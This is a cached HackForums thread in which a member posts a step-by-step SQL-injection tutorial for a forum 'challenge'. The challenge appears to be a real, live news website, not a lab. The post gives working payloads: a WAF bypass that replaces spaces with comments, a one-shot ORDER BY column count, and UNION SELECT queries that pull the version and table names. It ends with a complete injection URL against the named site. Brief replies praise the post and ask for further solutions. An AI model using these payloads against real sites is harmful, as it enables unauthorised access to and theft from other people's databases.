<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=3239625" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=3239625" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=3239625</a>. It is a snapshot of the page as it appeared on 24 Feb 2014 07:17:04 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=3239625" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:1iZ6Q9DJ4SwJ:www.hackforums.net/showthread.php%3Ftid%3D3239625&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[case tutorial] How to solve challenge #38 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[case tutorial] How to solve challenge #38"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=3239625"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 02-24-2014, 12:17 AM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[case tutorial] How to solve challenge #38</span></div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=3239625" class="bitButton" style="margin-bottom:5px;" rel="nofollow" title="Thread Closed">Closed</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/rating.js"></script><div id="success_rating_3239625" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_3239625"><li style="width: 0%" class="current_rating" id="current_rating_3239625">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=3239625&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3239625&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3239625&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3239625&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3239625&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_3239625" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_3239625_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=3239625" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3239625&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_3239625");
// -->
</script><div><strong>[case tutorial] How to solve challenge #38</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid30391359" id="pid30391359"></a><table class="tborder" style="border-top-width: 0; " id="post_30391359" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-10-2013, 03:21 AM <span id="edited_by_30391359"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3239625&amp;pid=30391359#pid30391359">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 133<br>Posts: 2,157<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">194</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_30391359">I am receiving many requests by PM for help, tips or explanation how to solve my challenges.<br><br>As
 I usually open challenges for people willing to sharpen their skills 
and learn new stuff here is an explanation how to solve my last 
challenge <span style="font-size: medium;"><span style="color: #00BFFF;">#38</span></span> <a href="http://www.hackforums.net/showthread.php?tid=3239002" target="_blank">http://www.hackforums.net/showthread.php?tid=3239002</a> <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br>All knowledge you'll need to solve this challenge is already in <span style="font-weight: bold;"><span style="color: #00BFFF;">my tutorials</span></span>:<ul><li><span style="color: #FFD700;">post injection</span> <a href="http://www.hackforums.net/showthread.php?tid=3013220" target="_blank">http://www.hackforums.net/showthread.php?tid=3013220</a></li> <li><span style="color: #FFD700;">learn from error response</span> <a href="http://www.hackforums.net/showthread.php?tid=2853082" target="_blank">http://www.hackforums.net/showthread.php?tid=2853082</a></li> <li><span style="color: #FFD700;">finding number of columns</span> <a href="http://www.hackforums.net/showthread.php?tid=2698410" target="_blank">http://www.hackforums.net/showthread.php?tid=2698410</a></li> <li><span style="color: #FFD700;">white spaces not allowed</span> <a href="http://www.hackforums.net/showthread.php?tid=2884351" target="_blank">http://www.hackforums.net/showthread.php?tid=2884351</a></li> <li><span style="color: #FFD700;">illegal mix of collation</span> <a href="http://www.hackforums.net/showthread.php?tid=2811867" target="_blank">http://www.hackforums.net/showthread.php?tid=2811867</a></li> <li><span style="color: #FFD700;">adding HTML tags</span> <a href="http://www.hackforums.net/showthread.php?tid=2798495" target="_blank">http://www.hackforums.net/showthread.php?tid=2798495</a><br></li></ul>Let's solve that challenge #38 using info from them... <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br><br>On
 each web site we should try different links. Maybe non of them is SQLi 
vulnerable. Then our fun is gone :) If we found SQLi vulnerable web site
 not all links are equally easy to inject. <span style="color: #32CD32;">That is why we must try different links. </span>Many times I start searching for the best place to inject with <span style="color: #FFD700;">search field</span>. We can see it on picture bellow.<br><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/1f9817ef1da45ee29d83ad3e93ec98f1.jpg" alt="[Image: 1f9817ef1da45ee29d83ad3e93ec98f1.jpg]" border="0"><br><br>Let's input some text (like abc) and add <span style="font-weight: bold;"><span style="color: #32CD32;">' </span></span>at the end of it to test for SQLi vulnerability. After we input <span style="color: #FFD700;">abc'</span> we get SQL error response.<br><br>Bingo,
 site is SQLi vulnerable. As we can't see search command which is 
executed when we click on button right of the search field we will use 
Firefox addon <span style="color: #00BFFF;">Live HTTP Headers</span>. See explanation how to use it in my <span style="color: #FFD700;">post injection tutorial </span><a href="http://www.hackforums.net/showthread.php?tid=3013220" target="_blank">http://www.hackforums.net/showthread.php?tid=3013220</a><br><br>After we captured search command and replay it we get dialog on picture bellow:<br><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/1fc373129112764d2f0b91327945477c.jpg" alt="[Image: 1fc373129112764d2f0b91327945477c.jpg]" border="0"><br><br>There we see GET request with our <span style="color: #32CD32;">abc'</span> (' = %27) text we input. Lets copy that text from <span style="color: #00BFFF;">Live HTTP Headers</span> to another Firefox addon <span style="color: #00BFFF;">HackBar</span> (see how to use it here <a href="http://www.hackforums.net/showthread.php?tid=2698410" target="_blank">http://www.hackforums.net/showthread.php?tid=2698410</a>
 ). We could change search command with Live HTTP Headers but we will 
continue in Hackbar so we can see commands and web response at the same 
time on all pictures to the end of this tutorial.<br><br><span style="color: #FF6347;"><span style="font-weight: bold;">First we should carefully analyze error response</span></span> - see my tutorial about how important this is here <a href="http://www.hackforums.net/showthread.php?tid=2853082" target="_blank">http://www.hackforums.net/showthread.php?tid=2853082</a> Many times we can fully adapt our command based on error response. <span style="color: #32CD32;">We will skip this step at the moment</span> as we will do it in the next step trying <span style="color: #FFD700;">order by</span>.<br><br>Let's
 try to find out number of columns (challenge requested union select 
based SQLi and we need this info). We start with classic <span style="color: #FFD700;">order by 1-- -</span>
 ... and we get error. Now it is time to analyze that error. What can we
 learn from the error response? Here is a bigger picture to see it more 
clearly :)<br><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/d2a130aff495ebf4785bc9f547c96b1a.jpg" alt="[Image: d2a130aff495ebf4785bc9f547c96b1a.jpg]" border="0"><br><br><span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #00BFFF;">#1</span></span></span><br>Pay attention to our command <span style="color: #FFD700;"><span style="font-weight: bold;"><span style="font-size: medium;">order by 1-- -</span></span></span><br><br>Hmm we have one white space between <span style="color: #FFD700;">order</span> and <span style="color: #FFD700;">by</span> and <span style="color: #FFD700;">1</span> and in the error response we can see <span style="color: #32CD32;">one white space</span> and character <span style="color: #32CD32;">+</span>. We didn't put <span style="color: #32CD32;">+</span> there so obviously WAF (Web Application Firewall) is "messing" with white spaces. That is obvious also from our end of command <span style="color: #FFD700;">-- -</span> which became <span style="color: #32CD32;">-- +-</span>. So now we know <span style="color: #FFD700;">white space</span> is changed to <span style="color: #32CD32;">white space</span> and <span style="color: #32CD32;">+</span>.<br><br>Lets try with <span style="color: #FFD700;">order+by+1-- -</span>. Same WAF effect, this time <span style="color: #FFD700;">+</span> is changed to <span style="color: #32CD32;">white space</span> and <span style="color: #32CD32;">+</span> We can suspect <span style="color: #32CD32;">+</span> is not allowed in our SQLi command as WAF is adding it to every white space.<br><br>Let's try one of the strategies when we have problems with white spaces. We will follow <span style="color: #FFD700;">my tutorial about white spaces</span> <a href="http://www.hackforums.net/showthread.php?tid=2884351" target="_blank">http://www.hackforums.net/showthread.php?tid=2884351</a> to bypass that problem. There are many possibilities to replace white space with something else like <span style="color: #00BFFF;">/**/</span> or <span style="color: #00BFFF;">%0A</span>. We can also write our command WITHOUT white spaces using <span style="color: #00BFFF;">()</span>. Let's modify our command and replace white spaces with /**/ to <span style="color: #FFD700;">/**/order/**/by/**/1</span>.<br><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/7f9145bfe511e2b982bf8edaffb60463.jpg" alt="[Image: 7f9145bfe511e2b982bf8edaffb60463.jpg]" border="0"><br><br>Hmm, we still get an error. <span style="color: #FF6347;"><span style="font-weight: bold;">Did we analyze error response carefully enough? Well we didn't yet, as we focused only on white spaces for now...</span></span><br><br><span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #00BFFF;">#2</span></span></span><br>As we see from error response<br><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/964a11b7ab064f6779545570128b29c1.jpg" alt="[Image: 964a11b7ab064f6779545570128b29c1.jpg]" border="0"><br>there is executed a boolean full-text search using the <span style="color: #00BFFF;">IN BOOLEAN MODE</span> modifier. Command must end with <span style="font-weight: bold;"><span style="color: #FFD700;">)</span></span>. We can see this from error response. Let's add that <span style="color: #FFD700;">)</span> after text to search we input <span style="color: #FFD700;">abc')</span> and run our command <span style="color: #FFD700;">abc')/**/order/**/by/**/1-- -</span> again.<br><br><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> error is gone <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"> <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/yeye.gif" style="vertical-align: middle;" alt="Yeye" title="Yeye" border="0"> And now we know it is string based SQLi.<br><br>Let's
 continue finding out number of columns. We know how command should be 
formatted to work. We can try finding number of column <span style="color: #FFD700;">step by step</span> and analyzing error. I prefer using method <span style="color: #FFD700;">to find number of columns</span> <span style="color: #00BFFF;">in one shot</span> - see my tutorial here <a href="http://www.hackforums.net/showthread.php?tid=2698410" target="_blank">http://www.hackforums.net/showthread.php?tid=2698410</a><br><br>Let's change our <span style="color: #FFD700;">/**/order/**/by/**/1-- -</span> to<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>abc')/**/order/**/by/**/<br>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
​
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5
​7,58,59,60,61,62,63,64,65,66,67,68,69,70-- -</code></div></div>Using hackbar (see tutorial mentioned above) this is quick (only two clicks with mouse button)<br><br>And result we get is:<br><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/4fc17cd5a2004d8a1235f980bd0eacec.jpg" alt="[Image: 4fc17cd5a2004d8a1235f980bd0eacec.jpg]" border="0"><br><br>Ok, now we know there are 6 columns :) And we know white spaces are not allowed. Let make our union select command: <span style="color: #FFD700;">abc')union/**/select/**/1,2,3,4,5,6-- -</span><br><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/945067a76bcb1f5cec4f60cc3c34004f.jpg" alt="[Image: 945067a76bcb1f5cec4f60cc3c34004f.jpg]" border="0"><br><br>We see vulnerable columns 3 and 4 on picture above. As command works there is obviously no WAF protecting commands <span style="color: #FFD700;">union</span> and <span style="color: #FFD700;">select</span>. Let's inject at column 3 to get version and at column 4 to get tables in database. We will use this command<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>abc')union/**/select/**/1,2,concat(0x3c666f6e7420636f6c6f723d7265643e,version(),0x203a3a20616a6b61726f),
​
group_concat(table_name,0x3c62723e),5,6/**/from/**/information_schema.tables/**/where/**/table_schema=database()--
 -</code></div></div>There we use function <span style="color: #00BFFF;">concat</span> to add our nick name to version. Before that we use HTML command to change font color to red <span style="color: #FF6347;">&lt;Font color=red&gt;</span>. For tables we used command <span style="color: #00BFFF;">group_concat</span> where beside table_name we add HTML tag <span style="color: #FFD700;">&lt;br&gt;</span> to see every table name in a new row. See explanation for that in <span style="color: #FFD700;">my tutorial about using HTML tags in SQLi</span> <a href="http://www.hackforums.net/showthread.php?tid=2798495" target="_blank">http://www.hackforums.net/showthread.php?tid=2798495</a><br><br>What we get?<br><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/b5bc1224820e515911cc520ff24b7594.jpg" alt="[Image: b5bc1224820e515911cc520ff24b7594.jpg]" border="0"><br><br>Another error... No big deal as we know how to bypass it using <span style="color: #FFD700;">my tutorial illegal mix of collations</span> <a href="http://www.hackforums.net/showthread.php?tid=2811867" target="_blank">http://www.hackforums.net/showthread.php?tid=2811867</a> We will choose <span style="color: #00BFFF;">unhex(hex(xx))</span> to overcome that error.<br><br><span style="color: #32CD32;"><span style="font-weight: bold;">So our final command will be </span></span><br><a href="http://www.armtoday.info/default.asp?search=" target="_blank">http://www.armtoday.info/default.asp?search=</a><span style="color: #32CD32;">abc')union/**/select/**/1,2,concat(0x3c666f6e7420636f6c6f723d7265643e,version(),0x203a3a20616a6b61726f),
​
unhex(hex(group_concat(table_name,0x3c62723e))),5,6/**/from/**/information_schema.tables/**/where/**/table_schema=database()--
 -</span>&amp;submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&amp;mode=allwords&amp;SectionID=-1&amp;Lang=_Ru<br><br>Our constructed SQLi is in green. Challenge solved <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br>Sorry for long text but I want to explain well with many pictures. Hope you learned something useful.<br><br>For exercise try other options to bypass white spaces using <span style="color: #FFD700;">%0A</span> or using command without white spaces at all using <span style="color: #FFD700;">()</span>.</div><div class="post_meta" id="post_meta_30391359"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"></div></td></tr></tbody></table><a name="pid30466177" id="pid30466177"></a><table class="tborder" style="margin-top: 5px; " id="post_30466177" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-10-2013, 04:42 AM <span id="edited_by_30466177"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3239625&amp;pid=30466177#pid30466177">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1406490"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/tumblr_liub5s_Gkby1qi06hno1_500_thumb.jpg" alt="" height="84" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1406490"><span class="group9">p0pc0rn</span></a></span></strong> <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">&lt;3 Zixem<br><span class="userstars"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 33<br>Posts: 693<br>Joined: Jul 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1406490"><strong class="reputation_positive">45</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_30466177">ah..so there's another way to solve it as well. nice one.this one looks more understandable :)</div><div class="post_meta" id="post_meta_30466177"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1406490" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"></div></td></tr></tbody></table><a name="pid30467215" id="pid30467215"></a><table class="tborder" style="margin-top: 5px; " id="post_30467215" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-10-2013, 05:52 AM <span id="edited_by_30467215"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3239625&amp;pid=30467215#pid30467215">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=681552"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/S2YPH.jpg" alt="" height="100" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=681552"><span class="group2">torque59</span></a></span></strong> <img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5Bcase%20tutorial%5D%20How%20to%20solve%20challenge%20%2338%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 27<br>Posts: 349<br>Joined: Feb 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=681552"><strong class="reputation_positive">14</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_30467215">Gr8 work dude mind sharing out the solution to the 37th level also.Its kinda of tough</div><div class="post_meta" id="post_meta_30467215"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=681552" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"></div></td></tr></tbody></table><a name="pid30467434" id="pid30467434"></a><table class="tborder" style="margin-top: 5px; " id="post_30467434" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-10-2013, 06:08 AM <span id="edited_by_30467434"><span class="smalltext">(This post was last modified: 02-10-2013 06:42 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=895241">-zerocool</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a 